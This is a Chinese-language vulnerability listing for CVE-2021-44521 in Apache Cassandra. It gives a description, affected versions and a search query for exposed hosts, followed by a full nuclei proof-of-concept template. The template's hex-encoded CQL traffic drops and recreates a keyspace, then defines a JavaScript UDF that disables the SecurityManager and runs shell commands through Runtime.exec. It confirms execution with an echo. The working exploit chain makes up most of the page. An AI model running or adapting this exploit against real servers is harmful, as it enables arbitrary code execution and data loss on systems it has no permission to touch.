Apache Cassandra Load UDF RCE

漏洞信息

漏洞名称: Apache Cassandra Load UDF RCE

漏洞编号:

  • CVE: CVE-2021-44521

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Apache Cassandra是一个高度可扩展的分布式NoSQL数据库,广泛应用于需要处理大量数据的场景,如社交媒体、在线服务和云计算平台。它支持跨数据中心的数据复制,提供了高可用性和无单点故障的特性。

该漏洞存在于Apache Cassandra的用户定义函数(UDF)功能中,当配置为启用用户定义函数和脚本化用户定义函数,但未启用用户定义函数线程时,攻击者可以通过创建特定的用户定义函数来执行任意代码。这属于命令执行漏洞,其技术根源在于不安全的配置允许了未经充分验证的代码执行。

成功利用此漏洞的攻击者可以以Cassandra进程的权限执行任意代码,可能导致受影响的系统完全被控制。攻击者需要拥有足够的权限在集群中创建用户定义函数才能利用此漏洞。值得注意的是,这种配置在文档中被标记为不安全,并且在此CVE之后仍将被视为不安全。此漏洞的严重性在于它允许远程代码执行,且不需要用户交互,可以自动化利用,对系统的安全构成严重威胁。

产品厂商: apache

产品名称: cassandra

影响版本: 3.0.x < version <= 3.0.26, 3.11.x < version <= 3.11.12, 4.0.x < version <= 4.0.2

搜索语法: cpe:”cpe:2.3:a:apache:cassandra”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2021%2FCVE-2021-44521.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

id: CVE-2021-44521

info:
  name: Apache Cassandra Load UDF RCE
  author: Y4er
  severity: critical
  description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system.
  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
  reference:
    - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
    - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
    - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
    - http://www.openwall.com/lists/oss-security/2022/02/11/4
    - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-44521
    cwe-id: CWE-732,CWE-94
    epss-score: 0.91865
    epss-percentile: 0.99680
    cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: cassandra
    shodan-query: cpe:"cpe:2.3:a:apache:cassandra"
  tags: cve,cve2021,network,rce,apache,cassandra,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:9042"
    inputs:
      - data: "050000000500000000"
        type: hex
        read: 1024

      - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
        type: hex
        read: 1024

      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024

      - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
        type: hex
        read: 1024

      - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
        type: hex
        read: 1024

      - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
        type: hex
        read: 1024

      - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
        type: hex
        read: 1024

      - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
        type: hex
        read: 1024

      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "123123"
# digest: 4a0a00473045022100d0837ea19e76ae9fbddc08aea0ca103b39a3a004d0187d46bd75cc9f605c75fd022040ec326b0cfefa5b5ac2b13274061045378dc958a1eaf77b97aa3b57a4456a75:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Apache Cassandra Load UDF RCE
http://example.com/2025/07/08/github_1664943902/
作者
lianccc
发布于
2025年7月8日
许可协议